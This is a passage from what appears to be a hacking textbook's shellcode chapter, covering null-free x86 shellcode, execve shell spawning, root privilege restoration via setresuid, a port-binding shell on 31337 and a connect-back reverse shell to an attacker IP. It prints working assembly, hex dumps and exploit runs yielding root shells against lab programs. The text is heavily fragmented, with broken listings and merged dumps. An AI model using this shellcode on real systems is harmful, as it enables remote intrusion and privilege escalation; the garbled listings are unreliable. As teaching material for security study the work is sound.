0000002C  776F              ja 0x9d
0000002E  726C              jc 0x9c
00000030  64210A            and [fs:edx],ecx
00000033  0D                db 0x0D
reader@hacking:~/booksrc $

These remaining null bytes can be eliminated with an understanding of
register widths and addressing
...
This means execution can only jump a maximum of approximately
128 bytes in either direction
...
The
difference between assembled machine code for the two jump varieties is
shown below:
EB 1E             jmp short 0x20

versus

E9 1E 00 00 00    jmp 0x23

The EAX, EBX, ECX, EDX, ESI, EDI, EBP, and ESP registers are 32 bits
in width
...
These original 16-bit versions
of the registers can still be used for accessing the first 16 bits of each corresponding 32-bit register
...
Naturally,
assembly instructions using the smaller registers only need to specify operands
up to the register’s bit width
...

Machine code      Assembly
B8 04 00 00 00    mov eax,0x4
66 B8 04 00       mov ax,0x4
B0 04             mov al,0x4

Using the AL, BL, CL, or DL register will put the correct least significant
byte into the corresponding extended register without creating any null bytes
in the machine code
...
This is especially true for shellcode, since it will be taking
over another process
...
Here are some more simple assembly
instructions for your arsenal
...

Instruction

Description

inc

Increment the target operand by adding 1 to it
...

The next few instructions, like the mov instruction, have two operands
...

Instruction

Description

add <dest>, <source>

Add the source operand to the destination operand, storing the result
in the destination
...

or <dest>, <source>

Perform a bitwise or logic operation, comparing each bit of one
operand with the corresponding bit of the other operand
...
The final result is stored in
the destination operand
...

1 or 0 = 1
1 or 1 = 1
0 or 1 = 1
0 or 0 = 0

The result bit is on only if both the source bit and the destination bit
are on
...

xor <dest>, <source>

Perform a bitwise exclusive or (xor) logical operation, comparing each
bit of one operand with the corresponding bit of the other operand
...
The final result is stored in the destination operand
...
Can you think of a way
to optimize this technique? The DWORD value specified in each instruction
comprises 80 percent of the code
...
This can be done with a single
two-byte instruction:
29 C0             sub eax,eax

Using the sub instruction will work fine when zeroing registers at the
beginning of shellcode
...
For that reason, there is a preferred two-byte instruction that is used to zero registers in most shellcode
...
Since 1 xored
with 1 results in a 0, and 0 xored with 0 results in a 0, any value xored with itself
will result in 0
...
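The same reasoning can be checked in C, where ^ is the bitwise xor operator. This is only an illustrative model of the register operation; the function names xor_with_self and xor_bit are invented for this sketch.

```c
#include <assert.h>
#include <stdint.h>

/* Model of "xor reg, reg": every bit is xored with itself, so the result
 * is zero no matter what the register held before. */
uint32_t xor_with_self(uint32_t reg)
{
    return reg ^ reg;
}

/* Single-bit xor, for checking the truth table (arguments must be 0 or 1). */
unsigned xor_bit(unsigned a, unsigned b)
{
    assert(a <= 1 && b <= 1);
    return a ^ b;
}
```

Whatever value is passed to xor_with_self, the result is 0, which is why the instruction works anywhere in the shellcode and not just at the beginning.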

31 C0             xor eax,eax

You can safely use the sub instruction to zero registers (if done at the
beginning of the shellcode), but the xor instruction is most commonly used
in shellcode in the wild
...
The inc and dec
instructions have also been used when possible to make for even smaller
shellcode
...
s
BITS 32             ; Tell nasm this is 32-bit code
...

two:
; ssize_t write(int fd, const void *buf, size_t count);
  pop ecx           ; Pop the return address (string ptr) into ecx
  xor eax, eax
  mov al, 4         ; Write syscall #4 to the low byte of eax
  xor ebx, ebx
  inc ebx           ; Increment ebx to 1, STDOUT file descriptor
  xor edx, edx
  mov dl, 15
  int 0x80
...
  dec ebx           ; Decrement ebx back down to 0 for status = 0
...

After assembling this shellcode, hexdump and grep are used to quickly
check it for null bytes
...
s
$ hexdump -C helloworld3 | grep --color=auto 00
b0 04 31 db 43 31 d2 b2 0f cd 80 |
...
1
...
|
e8 e8 ff ff ff 48 65 6c 6c 6f 2c |
...
Hello,|
64 21 0a 0d
| world!
...
When
used with an exploit, the notesearch program is coerced into greeting the
world like a newbie
...
/getenvaddr SHELLCODE
...
/notesearch $(perl -e 'print "\xbc\xf9\xff\xbf"x40')
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------
Hello, world!
reader@hacking:~/booksrc $

0x530 Shell-Spawning Shellcode
Now that you’ve learned how to make system calls and avoid null bytes, all
sorts of shellcodes can be constructed
...
System call number 11,
execve(), is similar to the C execute() function that we used in the previous
chapters
...
h>
int execve(const char *filename, char *const argv[],
char *const envp[]);
DESCRIPTION
execve() executes the program pointed to by filename
...
In the latter case, the interpreter must
be a valid pathname for an executable which is not itself a script,
which will be invoked as interpreter [arg] filename
...
envp
is an array of strings, conventionally of the form key=value, which are
passed as environment to the new program
...
The argument vector and environment can
be accessed by the called program's main function, when it is defined
as int main(int argc, char *argv[], char *envp[])
...
The environment array (the third argument) can be empty, but it still needs to be terminated with a
32-bit null pointer
...
Done in C, a program
making this call would look like this:
exec_shell
...
h>
int main() {
char filename[] = "/bin/sh\x00";
char **argv, **envp; // Arrays that contain char pointers
argv[0] = filename; // The only argument is filename
...

envp[0] = 0; // Null terminate the environment array
...
In addition, the "/bin/sh" string needs to be terminated with
a null byte
...
Dealing with memory in
assembly is similar to using pointers in C
...

Instruction

Description

lea <dest>, <source>

Load the effective address of the source operand into the destination
operand
...
For example, the following instruction
in assembly will treat EBX+12 as a pointer and write eax to where it’s pointing
...
The environment array is collapsed into the end of
the argument array, so they share the same 32-bit null terminator
...
s
BITS 32

  jmp short two     ; Jump down to the bottom for the call trick
one:
; int ...
  pop ...
  xor eax, eax      ; Put 0 into eax
  mov ...
  mov [ebx+8], ebx  ; Put addr from ebx where the AAAA is
  mov ...
  lea ecx, [ebx+8]  ; Load the address of [ebx+8] into ecx for argv ptr
  lea ...
  mov al, 11        ; Syscall #11
  int 0x80          ; Do it
...

  db '/bin/shXAAAABBBB' ; The XAAAABBBB bytes aren't needed
...
Loading the effective address of a bracketed
register added to a value is an efficient way to add the value to the register
and store the result in another register
...

Loading the address of a dereferenced pointer produces the original pointer,
so this instruction puts EBX+8 into EDX
...
When assembled, this shellcode is devoid of null
bytes
...
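The in-memory patching of the string area can be modeled in C. This sketch assumes the layout implied by the '/bin/shXAAAABBBB' string: the X at offset 7 becomes the string terminator, AAAA at offset 8 becomes the argv pointer, and BBBB at offset 12 becomes the shared null terminator. The function names and the example address used to exercise it are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Write a 32-bit value in little-endian order, as a mov to memory would. */
static void store_le32(unsigned char *dst, uint32_t value)
{
    dst[0] = (unsigned char)(value & 0xff);
    dst[1] = (unsigned char)((value >> 8) & 0xff);
    dst[2] = (unsigned char)((value >> 16) & 0xff);
    dst[3] = (unsigned char)((value >> 24) & 0xff);
}

/* Patch the 16-byte "/bin/shXAAAABBBB" area in place.
 * string_addr stands in for the address popped into ebx; it is an assumed
 * example value, not one taken from a real process. */
void patch_exec_area(unsigned char area[16], uint32_t string_addr)
{
    assert(area != NULL);
    area[7] = 0x00;                     /* X    -> string terminator       */
    store_le32(area + 8, string_addr);  /* AAAA -> argv[0] = string addr   */
    store_le32(area + 12, 0);           /* BBBB -> shared null terminator  */
}
```

After the patch, the address of offset 8 serves as the argument array and the address of offset 12 serves as the environment array, so a single null DWORD terminates both.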

reader@hacking:~/booksrc $ nasm exec_shell
...
/getenvaddr SHELLCODE
SHELLCODE will be at 0xbffff9c0
reader@hacking:~/booksrc $
...
[1
...
C
...
S
...
/notesearch
'print "\xc0\xf9\xff\xbf"x40')

sh-3
...
2#

This shellcode, however, can be shortened to less than the current
45 bytes
...
The smaller the shellcode, the more situations it can be used
in
...

reader@hacking:~/booksrc/shellcodes $ hexdump -C exec_shell
00000000  eb 16 5b 31 c0 88 43 07  89 5b 08 89 43 0c 8d 4b
00000010  08 8d 53 0c b0 0b cd 80  e8 e5 ff ff ff 2f 62 69
00000020  6e 2f 73 68
00000024
reader@hacking:~/booksrc/shellcodes $ wc -c exec_shell
36 exec_shell
reader@hacking:~/booksrc/shellcodes $

This shellcode can be shrunk down further by redesigning it and using
registers more efficiently
...
When a value is pushed to the stack, ESP is moved up in
memory (by subtracting 4) and the value is placed at the top of the stack
...

The following shellcode uses push instructions to build the necessary
structures in memory for the execve() system call
...
s
BITS 32

; execve(const char *filename, char *const argv [], char *const envp[])
  xor eax, eax      ; Zero out eax
  push eax          ; Push some nulls for string termination
  push 0x68732f2f   ; Push "//sh" to the stack
  push 0x6e69622f   ; Push "/bin" to the stack
  mov ebx, esp      ; Put the address of "/bin//sh" into ebx, via esp
  push eax          ; Push 32-bit null terminator to stack
  mov edx, esp      ; This is an empty array for envp
  push ebx          ; Push string addr to stack above null terminator
  mov ecx, esp      ; This is the argv array with string ptr
  mov al, 11        ; Syscall #11
  int 0x80          ; Do it
...
The extra slash doesn’t matter and
is effectively ignored
...
The resulting shellcode still spawns a shell but is only
25 bytes, compared to 36 bytes using the jmp call method
...
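The two push operands are just the string chunks packed in little-endian order, which a few lines of C can confirm. This is a small sketch; the function name push_dword_for is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Pack four characters into the DWORD that push needs so that they end up
 * in memory in reading order on a little-endian x86 stack. */
uint32_t push_dword_for(const char chunk[4])
{
    assert(chunk != NULL);
    return (uint32_t)(unsigned char)chunk[0]
         | ((uint32_t)(unsigned char)chunk[1] << 8)
         | ((uint32_t)(unsigned char)chunk[2] << 16)
         | ((uint32_t)(unsigned char)chunk[3] << 24);
}
```

push_dword_for("//sh") yields 0x68732f2f and push_dword_for("/bin") yields 0x6e69622f. Because the stack grows toward lower addresses, "//sh" is pushed first so that "/bin" ends up in front of it in memory.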
s
reader@hacking:~/booksrc $ wc -c tiny_shell
25 tiny_shell
reader@hacking:~/booksrc $ hexdump -C tiny_shell
00000000 31 c0 50 68 2f 2f 73 68 68 2f 62 69 6e
00000010 89 e2 53 89 e1 b0 0b cd 80
00000019
reader@hacking:~/booksrc $ export SHELLCODE=$(cat
reader@hacking:~/booksrc $
...
/notesearch $(perl -e
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999
[DEBUG] found a 5 byte note for user id 999
[DEBUG] found a 35 byte note for user id 999
[DEBUG] found a 9 byte note for user id 999
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------
sh-3
...
Ph//shh/bin
...
S
...
/notesearch
'print "\xcb\xf9\xff\xbf"x40')

0x531 A Matter of Privilege
To help mitigate rampant privilege escalation, some privileged processes will
lower their effective privileges while doing things that don’t require that kind
of access
...
By changing the effective user ID, the privileges of the process
can be changed
...

SETEGID(2)

Linux Programmer's Manual

SETEGID(2)

NAME
seteuid, setegid - set effective user or group ID
SYNOPSIS
#include ...
h>
int seteuid(uid_t euid);
int setegid(gid_t egid);
DESCRIPTION
seteuid() sets the effective user ID of the current process
...

Precisely the same holds for setegid() with "group" instead of "user"
...
On error, -1 is returned, and errno is
set appropriately
...

drop_privs
...
h>
void lowered_privilege_function(unsigned char *ptr) {
char buffer[50];
seteuid(5); // Drop privileges to games user
...
This only
spawns a shell for the games user, without root access
...
c
reader@hacking:~/booksrc $ sudo chown root
...
/drop_privs
reader@hacking:~/booksrc $ export SHELLCODE=$(cat tiny_shell)
reader@hacking:~/booksrc $
...
/drop_privs
SHELLCODE will be at 0xbffff9cb
reader@hacking:~/booksrc $
...
2$ whoami
games
sh-3
...
2$

Fortunately, the privileges can easily be restored at the beginning of our
shellcode with a system call to set the privileges back to root
...
The system call number and manual page are
shown below
...
h
#define __NR_setresuid          164
#define __NR_setresuid32        208
reader@hacking:~/booksrc $ man 2 setresuid
SETRESUID(2)
Linux Programmer's Manual
SETRESUID(2)
NAME
setresuid, setresgid - set real, effective and saved user or group ID
SYNOPSIS
#define _GNU_SOURCE
#include ...

The following shellcode makes a call to setresuid() before spawning the
shell to restore root privileges
...
s
BITS 32
; setresuid(uid_t ruid, uid_t euid, uid_t suid);
xor eax, eax
; Zero out eax
...

xor ecx, ecx
; Zero out ecx
...

mov al, 0xa4
; 164 (0xa4) for syscall #164
int 0x80
; setresuid(0, 0, 0) Restore all root privs
...

; syscall #11
; push some nulls for string termination
...

; push "/bin" to the stack
...

; push 32-bit null terminator to stack
...

; push string addr to stack above null terminator
...

; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

This way, even if a program is running under lowered privileges when it’s
exploited, the shellcode can restore the privileges
...

reader@hacking:~/booksrc $ nasm priv_shell
...
/getenvaddr SHELLCODE
...
/drop_privs $(perl -e 'print "\xbf\xf9\xff\xbf"x40')
sh-3
...
2# id
uid=0(root) gid=999(reader)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scan
ner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(reader)
sh-3
...
There is a single-byte
x86 instruction called cdq , which stands for convert doubleword to quadword
...
Since
the registers are 32-bit doublewords, it takes two registers to store a 64-bit
quadword
...
Operationally, this means if the sign bit of EAX
is 0, the cdq instruction will zero the EDX register
...
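The sign extension performed by cdq can be modeled in a few lines of C. This is only a sketch of the EDX half of the operation; the function name and the pointer-based interface are choices made for illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Model of cdq: edx receives 32 copies of the sign bit of eax. */
void cdq(uint32_t eax, uint32_t *edx)
{
    assert(edx != NULL);
    *edx = (eax & 0x80000000u) ? 0xffffffffu : 0x00000000u;
}
```

With a small positive value such as 11 in eax, edx ends up as 0 regardless of what it held before, which is the property the shellcode relies on.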
Since the stack is
32-bit aligned, a single byte value pushed to the stack will be aligned as a
doubleword
...
The instructions that push a single byte and pop it back
into a register take three bytes, while using xor to zero the register and moving
a single byte takes four bytes
31 C0             xor eax,eax
B0 0B             mov al,0xb

compared to

6A 0B             push byte +0xb
58                pop eax

These tricks (shown in bold) are used in the following shellcode listing
...

shellcode
...

xor ebx, ebx
; Zero out ebx
...

cdq
; Zero out edx using the sign bit from eax
...

; execve(const char *filename, char *const argv [], char *const envp[])

  push BYTE 11      ; push 11 to the stack
  pop eax           ; pop the dword of 11 into eax
  push ecx          ; push some nulls for string termination
  push 0x68732f2f   ; push "//sh" to the stack
  push 0x6e69622f   ; push "/bin" to the stack
  mov ebx, esp      ; Put the address of "/bin//sh" into ebx via esp
  push ecx          ; push 32-bit null terminator to stack
  mov edx, esp      ; This is an empty array for envp
  push ebx          ; push string addr to stack above null terminator
  mov ecx, esp      ; This is the argv array with string ptr
  int 0x80          ; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

The syntax for pushing a single byte requires the size to be declared
...

These sizes can be implied from register widths, so moving into the AL
register implies the BYTE size
...

0x540 Port-Binding Shellcode
When exploiting a remote program, the shellcode we’ve designed so far won’t
work
...
Port-binding shellcode will bind the shell
to a network port where it listens for incoming connections
...
The
following C code binds to port 31337 and listens for a TCP connection
...
c
#include
#include
#include
#include
#include

...
h>
...
h>
...
sin_family = AF_INET;
host_addr
...
sin_addr
...
sin_zero), '\0', 8);

//
//
//
//

Host byte order
Short, network byte order
Automatically fill with my IP
...

bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));
listen(sockfd, 4);

sin_size = sizeof(struct sockaddr_in);
new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
}

These familiar socket functions can all be accessed with a single Linux
system call, aptly named socketcall()
...

reader@hacking:~/booksrc $ grep socketcall /usr/include/asm-i386/unistd
...
call
determines which socket function to invoke
...

User programs should call the appropriate functions by their usual
names
...

The possible call numbers for the first argument are listed in the
linux/net
...

From /usr/include/linux/net
...
The calls are simple enough, but some of them
require a sockaddr structure, which must be built by the shellcode
...

reader@hacking:~/booksrc $ gcc -g bind_port
...
/a
...
so
...

(gdb) list 18
13
sockfd = socket(PF_INET, SOCK_STREAM, 0);
14
15
host_addr
...
sin_port = htons(31337);
// Short, network byte order
17
host_addr
...
s_addr = INADDR_ANY; // Automatically fill with my IP
...
sin_zero), '\0', 8); // Zero the rest of the struct
...
c, line 13
...
c, line 20
...
out
Breakpoint 1, main () at bind_port
...
All three arguments are
pushed to the stack (but with mov instructions) in reverse order
...

(gdb) cont
Continuing
...
c:20
20
bind(sockfd, (struct sockaddr *)&host_addr, sizeof(struct sockaddr));
(gdb) print host_addr
$1 = {sin_family = 2, sin_port = 27002, sin_addr = {s_addr = 0},
sin_zero = "\000\000\000\000\000\000\000"}
(gdb) print sizeof(struct sockaddr)

$2 = 16
(gdb) x/16xb &host_addr
0xbffff780:     0x02    0x00    0x7a    0x69    0x00    0x00    0x00    0x00
0xbffff788:     0x00    0x00    0x00    0x00    0x00    0x00    0x00    0x00
(gdb) p /x 27002
$3 = 0x697a
(gdb) p 0x7a69
$4 = 31337
(gdb)

The next breakpoint happens after the sockaddr structure is filled with
values
...
The sin_family and sin_port elements are
both words, followed by the address as a DWORD
...
The remaining eight bytes
after that are just extra space in the structure
...
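The byte layout seen in the GDB dump can be reproduced by hand. The sketch below fills only the first eight bytes of the structure, under the assumption that the family is stored in x86 host order and the port in network order; build_sockaddr_head is an illustrative name, not a library function.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Fill the first 8 bytes of a sockaddr_in-style structure by hand:
 * family as a little-endian word (host order on x86), port as a
 * big-endian word (network order), then the 4-byte address. */
void build_sockaddr_head(unsigned char out[8], uint16_t family,
                         uint16_t port, const unsigned char ip[4])
{
    assert(out != NULL && ip != NULL);
    out[0] = (unsigned char)(family & 0xff);   /* sin_family, low byte first  */
    out[1] = (unsigned char)(family >> 8);
    out[2] = (unsigned char)(port >> 8);       /* sin_port, high byte first   */
    out[3] = (unsigned char)(port & 0xff);
    out[4] = ip[0];                            /* sin_addr, already in order  */
    out[5] = ip[1];
    out[6] = ip[2];
    out[7] = ip[3];
}
```

For family 2, port 31337, and an all-zero address, this produces 02 00 7a 69 00 00 00 00, the same eight bytes that begin the dump of host_addr.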

The following assembly instructions perform all the socket calls needed
to bind to port 31337 and accept TCP connections
...
The last eight bytes of the sockaddr
structure aren’t actually pushed to the stack, since they aren’t used
...

bind_port
...

pop eax
cdq
; Zero out edx for use as a null DWORD later
...

  inc ebx           ; 1 = SYS_SOCKET = socket()
  push edx          ; Build arg array: { protocol = 0,
  push BYTE 0x1     ;   (in reverse)     SOCK_STREAM = 1,
  push BYTE 0x2     ;                    AF_INET = 2 }
  mov ecx, esp      ; ecx = ptr to argument array
  int 0x80          ; After syscall, eax has socket file descriptor
...

When a connection is accepted, the new socket file descriptor is put into EAX
at the end of this code
...
Fortunately, standard file descriptors make this fusion remarkably simple
...
Sockets, too, are
just file descriptors that can be read from and written to
...
There is a system call
specifically for duplicating file descriptors, called dup2
...

reader@hacking:~/booksrc $ grep dup2 /usr/include/asm-i386/unistd
...
h>

int dup(int oldfd);
int dup2(int oldfd, int newfd);
DESCRIPTION
dup() and dup2() create a copy of the file descriptor oldfd
...

The bind_port
...
The following instructions are added in the file bind_shell_beta
...
The spawned
shell’s standard input and output file descriptors will be the TCP connection,
allowing remote shell access
...
s
; dup2(connected socket, {all three standard I/O file descriptors})
mov ebx, eax
; Move socket FD in ebx
...

; push "//sh" to the stack
...

; Put the address of "/bin//sh" into ebx via esp
...

; This is an empty array for envp
...

; This is the argv array with string ptr
...
In the output below, grep
is used to quickly check for null bytes
...

reader@hacking:~/booksrc
reader@hacking:~/booksrc
00000000 6a 66 58 99 31
00000010 89 c6 6a 66 58
00000020 10 51 56 89 e1

$ nasm bind_shell_beta
...
1
...
j
...
jfXCRfhzifS
...
QV
...
|

00000030 80 b0 66 43 52 52 56 89 e1 cd 80 89 c3
00000040 31 c9 cd 80 b0 3f 41 cd 80 b0 3f 41 cd
00000050 52 68 2f 2f 73 68 68 2f 62 69 6e 89 e3
00000060 53 89 e1 cd 80
00000065
reader@hacking:~/booksrc $ export SHELLCODE=$(cat
reader@hacking:~/booksrc $
...
/notesearch $(perl -e
[DEBUG] found a 33 byte note for user id 999
-------[ end of note data ]-------

6a 3f 58 |
...
j?X|
80 b0 0b |1
...
?A
...
R
...
|
bind_shell_beta)

...
Then, netcat is used to connect to the root shell on that port
...
0
...
1 31337
localhost [127
...
0
...
With control structures, the repeated calls to dup2 could be
shrunk down to a single call in a loop
...
Disassembling the main
function will show us how the compiler implemented the for loop using assembly instructions
...

This variable is referenced in relation to the EBP register as [ebp-4]
...
c
reader@hacking:~/booksrc $ gdb -q
...
out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db
...
1"
...

(gdb)

lea    eax,[ebp-4]
inc    DWORD PTR [eax]
jmp    0x804838b
leave
ret

The loop contains two new instructions: cmp (compare) and jle (jump if
less than or equal to), the latter belonging to the family of conditional jump
instructions
...
Then, a conditional jump instruction will jump based on
the flags
...
Otherwise, the
next jmp instruction brings execution to the end of the function at 0x080483a6,
exiting the loop
...
Using conditional jump instructions, complex
programming control structures such as loops can be created in assembly
...

Instruction

Description

cmp <dest>, <source>

Compare the destination operand with the source, setting flags for use
with a conditional jump instruction
...

jne

Jump if not equal
...

jle

Jump if less than or equal to
...

jnle

Jump if not less than or equal to
...

jng

jnge

Jump if not greater than, or not greater than or equal to
...

xor eax, eax
; Zero eax
...

jle dup_loop
; If ecx <= 2, jump to dup_loop
...
With
a more complete understanding of the flags used by the cmp instruction, this
loop can be shrunk even further
...
These flags are carry flag (CF), parity flag (PF), adjust flag (AF), overflow flag (OF), zero flag (ZF), and sign flag (SF)
...
The zero flag is set to true if the
result is zero, otherwise it is false
...

This means that, after any instruction with a negative result, the sign flag
becomes true and the zero flag becomes false
...

SF

sign flag

True if the result is negative (equal to the most significant bit of result)
...
The jle (jump if
less than or equal to) instruction is actually checking the zero and sign flags
...
The other conditional jump instructions work in a similar way, and there are still more conditional jump
instructions that directly check individual status flags:
Instruction

Description

jz

Jump to target if the zero flag is set
...

js

Jump if the sign flag is set
...

With this knowledge, the cmp (compare) instruction can be removed
entirely if the loop’s order is reversed
...
The shortened loop is shown
below, with the changes shown in bold
...

xor eax, eax
; Zero eax
...

pop ecx
dup_loop:
mov BYTE al, 0x3F ; dup2 syscall #63
int 0x80
; dup2(c, 0)
dec ecx
; Count down to 0
...
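The control flow of the reversed loop can be traced in C. This is a model rather than working socket code: it records the descriptor numbers that dup2 would receive instead of calling it, and it assumes the counter starts at 2 and that the loop repeats while the sign flag is clear. The name dup_loop_targets is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Model of the shortened loop: run the body, decrement ecx, and keep
 * looping while the sign flag is clear. Returns how many times the body
 * ran and records up to max counter values in targets. */
size_t dup_loop_targets(int32_t start, int32_t *targets, size_t max)
{
    size_t count = 0;
    int32_t ecx = start;
    int sign_flag;

    assert(targets != NULL);
    assert(start >= 0);
    do {
        if (count < max)
            targets[count] = ecx;   /* dup2(socket, ecx) would run here */
        count++;
        ecx--;                      /* dec ecx */
        sign_flag = (ecx < 0);      /* SF follows the top bit of the result */
    } while (!sign_flag);           /* loop again while SF is clear */
    return count;
}
```

Starting from 2, the body runs three times, for 2, 1, and 0, and the loop exits once the decrement produces -1 and sets the sign flag.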

The first two instructions before the loop can be shortened with the xchg
(exchange) instruction
...

This single instruction can replace both of the following instructions,
which take up four bytes:
89 C3             mov ebx,eax
31 C0             xor eax,eax

The EAX register needs to be zeroed to clear only the upper three bytes
of the register, and EBX already has these upper bytes cleared
...
Naturally, this
only works in situations where the source operand’s register doesn’t matter
...

bind_shell
...

pop eax
cdq
; Zero out edx for use as a null DWORD later
...

  inc ebx           ; 1 = SYS_SOCKET = socket()
  push edx          ; Build arg array: { protocol = 0,
  push BYTE 0x1     ;   (in reverse)     SOCK_STREAM = 1,
  push BYTE 0x2     ;                    AF_INET = 2 }
  mov ecx, esp      ; ecx = ptr to argument array
  int 0x80          ; After syscall, eax has socket file descriptor
...

; bind(s, [2, 31337, 0], 16)
  push BYTE 0x66    ; socketcall (syscall #102)
  pop eax
  inc ebx           ; ebx = 2 = SYS_BIND = bind()
  push edx          ; Build sockaddr struct: INADDR_ANY = 0
  push WORD 0x697a  ;   (in reverse order)   PORT = 31337
  push WORD bx      ;                        AF_INET = 2
  mov ecx, esp      ; ecx = server struct pointer
  push BYTE 16      ; argv: { sizeof(server struct) = 16,
  push ecx          ;         server struct pointer,
  push esi          ;         socket file descriptor }
  mov ecx, esp      ; ecx = argument array
  int 0x80          ; eax = 0 on success

; listen(s, 0)
  mov BYTE al, 0x66 ; socketcall (syscall #102)
  inc ebx
  inc ebx           ; ebx = 4 = SYS_LISTEN = listen()
  push ebx          ; argv: { backlog = 4,
  push esi          ;         socket fd }
  mov ecx, esp      ; ecx = argument array
  int 0x80

; c = accept(s, 0, 0)
  mov BYTE al, 0x66 ; socketcall (syscall #102)
  inc ebx           ; ebx = 5 = SYS_ACCEPT = accept()
  push edx          ; argv: { socklen = 0,
  push edx          ;         sockaddr ptr = NULL,
  push esi          ;         socket fd }
  mov ecx, esp      ; ecx = argument array
  int 0x80          ; eax = connected socket FD

; dup2(connected socket, {all three standard I/O file descriptors})
xchg eax, ebx
; Put socket FD in ebx and 0x00000005 in eax
...

pop ecx
dup_loop:
mov BYTE al, 0x3F ; dup2 syscall #63
int 0x80
; dup2(c, 0)
dec ecx
; count down to 0
jns dup_loop
; If the sign flag is not set, ecx is not negative
...

; push "//sh" to the stack
...

; Put the address of "/bin//sh" into ebx via esp
...

; This is an empty array for envp
...

; This is the argv array with string ptr
; execve("/bin//sh", ["/bin//sh", NULL], [NULL])

This assembles to the same 92-byte bind_shell shellcode used in the
previous chapter
...
s
$ hexdump -C bind_shell
db 43 52 6a 01 6a 02 89
52 66 68 7a 69 66 53 89
80 b0 66 43 43 53 56 89
56 89 e1 cd 80 93 6a 02
b0 0b 52 68 2f 2f 73 68
89 e2 53 89 e1 cd 80

e1
e1
e1
59
68

cd
6a
cd
b0
2f

80
10
80
3f
62

|jfX
...
CRj
...
|
|
...
j
...
fCCSV
...
fCRRV
...
Y
...
Iy
...
R
...
|

$ diff bind_shell portbinding_shellcode

0x550 Connect-Back Shellcode
Port-binding shellcode is easily foiled by firewalls
...
This limits
the user’s exposure and will prevent port-binding shellcode from receiving a
connection
...

However, firewalls typically do not filter outbound connections, since that
would hinder usability
...
This means that if
the shellcode initiates the outbound connection, most firewalls will allow it
...
Opening a
TCP connection only requires a call to socket() and a call to connect()
...
The following
connect-back shellcode was made from the bind-port shellcode with a few
modifications (shown in bold)
...
s
BITS 32
; s = socket(2, 1, 0)
push BYTE 0x66
; socketcall is syscall #102 (0x66)
...

xor ebx, ebx
; ebx is the type of socketcall
...

xchg esi, eax

; Save socket FD in esi for later
...
168
...
72
  push WORD 0x697a  ;   (in reverse order)   PORT = 31337
  push WORD bx      ;                        AF_INET = 2
  mov ecx, esp      ; ecx = server struct pointer
  push BYTE 16      ; argv: { sizeof(server struct) = 16,
  push ecx          ;         server struct pointer,
  push esi          ;         socket file descriptor }
  mov ecx, esp      ; ecx = argument array
  inc ebx           ; ebx = 3 = SYS_CONNECT = connect()
  int 0x80          ; eax = connected socket FD
; dup2(connected socket, {all three standard I/O file descriptors})
xchg eax, ebx
; Put socket FD in ebx and 0x00000003 in eax
...

pop ecx
dup_loop:
mov BYTE al, 0x3F ; dup2 syscall #63
int 0x80
; dup2(c, 0)
dec ecx
; Count down to 0
...

; execve(const char *filename, char *const argv [], char *const envp[])
  mov BYTE al, 11   ; execve syscall #11
  push edx          ; push some nulls for string termination
  push 0x68732f2f   ; push "//sh" to the stack
  push 0x6e69622f   ; push "/bin" to the stack
  mov ebx, esp      ; Put the address of "/bin//sh" into ebx via esp
  push edx          ; push 32-bit null terminator to stack
  mov edx, esp      ; This is an empty array for envp
  push ebx          ; push string addr to stack above null terminator
  mov ecx, esp      ; This is the argv array with string ptr
  int 0x80
...
168
...
72,
which should be the IP address of the attacking machine
...
This is made clear when each number is displayed
in hexadecimal:
reader@hacking:~/booksrc $ gdb -q
(gdb) p /x 192
$1 = 0xc0
(gdb) p /x 168
$2 = 0xa8
(gdb) p /x 42
$3 = 0x2a
(gdb) p /x 72
$4 = 0x48
(gdb) p /x 31337
$5 = 0x7a69
(gdb)

Since these values are stored in network byte order but the x86 architecture is in little-endian order, the stored DWORD seems to be reversed
...
168
...
72 is 0x482aa8c0
...
When the port number 31337
is printed in hexadecimal using gdb, the byte order is shown in little-endian
order
...
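Both reversed-looking operands can be derived mechanically. The following sketch assumes a little-endian machine model and uses hypothetical helper names (ip_push_dword, swap16); it is meant only to show where values like 0x482aa8c0 and 0x697a come from.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Build the DWORD to push so that the four octets land in memory in
 * network (big-endian) order on a little-endian machine. */
uint32_t ip_push_dword(const unsigned char octets[4])
{
    assert(octets != NULL);
    return (uint32_t)octets[0]
         | ((uint32_t)octets[1] << 8)
         | ((uint32_t)octets[2] << 16)
         | ((uint32_t)octets[3] << 24);
}

/* Swap the two bytes of a 16-bit value, as htons() does on x86. */
uint16_t swap16(uint16_t v)
{
    return (uint16_t)((v << 8) | (v >> 8));
}
```

For the octets 192, 168, 42, 72 the first helper returns 0x482aa8c0, and swap16(0x7a69) returns 0x697a, which is 27002 in decimal.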

The netcat program can also be used to listen for incoming connections
with the -l command-line option
...
The ifconfig command ensures
the IP address of eth0 is 192
...
42
...

reader@hacking:~/booksrc $ sudo ifconfig eth0 192
...
42
...
168
...
72 Bcast:192
...
42
...
255
...
0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0
...
0 b)
Interrupt:16
reader@hacking:~/booksrc $ nc -v -l -p 31337
listening on [any] 31337
...
From working with this program before, we know that the
request buffer is 500 bytes long and is located at 0xbffff5c0 in stack memory
...

reader@hacking:~/booksrc
reader@hacking:~/booksrc
00000000 6a 66 58 99 31
00000010 96 6a 66 58 43
00000020 89 e1 6a 10 51
00000030 b0 3f cd 80 49
00000040 2f 62 69 6e 89
0000004e
reader@hacking:~/booksrc
78 connectback_shell
reader@hacking:~/booksrc
402
reader@hacking:~/booksrc
$1 = 0xbffff688
